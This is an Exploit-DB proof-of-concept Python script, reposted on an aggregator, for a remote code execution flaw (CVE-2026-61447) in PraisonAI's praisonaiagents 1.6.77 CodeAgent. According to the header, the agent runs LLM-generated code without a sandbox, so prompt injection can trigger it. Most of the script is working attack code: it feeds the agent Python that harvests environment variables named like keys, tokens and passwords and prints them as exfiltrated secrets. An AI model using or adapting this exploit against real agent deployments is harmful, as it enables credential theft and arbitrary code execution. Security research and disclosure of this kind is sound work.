[remote] PraisonAI praisonaiagents 1.6.77 - Remote Code Execution
#!/usr/bin/env python3# Exploit Title: P 2026-8-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏

#!/usr/bin/env python3
# Exploit Title:         PraisonAI CodeAgent 1.6.77 - Remote Code Execution
# CVE:                   CVE-2026-61447
# Date:                  2026-07-13
# Exploit Author:        Mohammed Idrees Banyamer
# Author Country:        Jordan
# Instagram:             @banyamer_security
# Author GitHub:         https://github.com/mbanyamer
# Author Blog  :         https://banyamersecurity.com/blog/
# Vendor Homepage:       https://github.com/MervinPraison/PraisonAI
# Software Link:         https://pypi.org/project/praisonaiagents/
# Affected:              praisonaiagents <= 1.6.77
# Tested on:             praisonaiagents 1.6.77
# Category:              Remote Code Execution
# Platform:              Linux / Windows / macOS
# Exploit Type:          Python Script
# CVSS:                  10.0 (Critical)
# Description:           The CodeAgent._execute_python() in PraisonAI executes LLM-generated code without sandboxing, AST validation, or import restrictions. This allows full environment secret exfiltration and arbitrary code execution via prompt injection.
# Fixed in:              praisonaiagents >= 1.6.78
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Options:
#   --
#
# Notes:
#   • Requires the vulnerable praisonaiagents package installed.
#   • Demonstrates direct RCE and secret leakage.
#
# How to Use
#
# Step 1:
#   pip install praisonaiagents==1.6.77
#
# Step 2:
#   python3 exploit.py

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

banner()

from praisonaiagents.agent.code_agent import CodeAgent
import json

agent = CodeAgent(name="poc-agent")

malicious_code = """
import os
import json
secrets = {k: v for k, v in os.environ.items() 
           if any(keyword in k.upper() for keyword in 
                  ['KEY', 'SECRET', 'TOKEN', 'PASSWORD', 'CREDENTIAL', 'API', 'AUTH'])}
print("=== EXFILTRATED SECRETS ===")
print(json.dumps(secrets, indent=2))
"""

print("Executing malicious LLM-generated code...")
result = agent.execute(malicious_code)

print("\n=== Execution Result ===")
print("STDOUT:", result.get('stdout', ''))
print("STDERR:", result.get('stderr', ''))
print("Return Code:", result.get('returncode', ''))
            

文章来源: https://www.exploit-db.com/exploits/52639
如有侵权请联系:admin#unsafe.sh